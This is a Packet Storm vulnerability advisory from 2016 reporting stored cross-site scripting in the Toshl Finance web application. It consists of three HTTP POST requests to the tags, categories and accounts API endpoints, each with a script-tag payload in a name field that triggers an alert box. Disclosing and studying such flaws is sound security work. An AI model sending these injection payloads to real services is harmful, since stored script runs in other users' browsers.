Toshl Finance Web Application Cross Site Scripting

2016-06-25T00:00:00
ID PACKETSTORM:137640
Type packetstorm
Reporter Brett DeWall
Modified 2016-06-25T00:00:00

Description

                                        
                                            `# Exploit Title: Toshl Finance Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS)  
# Date: 6/24/16  
# Exploit Author: Brett DeWall  
# Exploit Author Twitter: @xbadbiddyx   
# Exploit Author Blog: http://xbadbiddyx.tumblr.com  
# Vendor Homepage: https://toshl.com/app/  
# Version: Latest commit  
# Contacted Vendor Date: 6/18/16  
  
  
### Vulnerable Area #1  
Request  
POST /api/tags?immediate_update=true HTTP/1.1  
Host: toshl.com  
  
{"type":"expense","name":"<script>alert('Vulnerable to XSS')</script>","category":"51076972"}  
  
  
### Vulnerable Area #2  
Request  
POST /api/categories HTTP/1.1  
Host: toshl.com  
  
{"type":"income","name":"<script>alert('Vulnerable to XSS')</script>"}  
  
  
### Vulnerable Area #3  
POST /api/accounts HTTP/1.1  
Host: toshl.com  
  
{"name":"<script>alert('Vulnerable to XSS')</script>","currency":{"code":"USD","rate":1,"fixed":false},"initial_balance":1000}  
`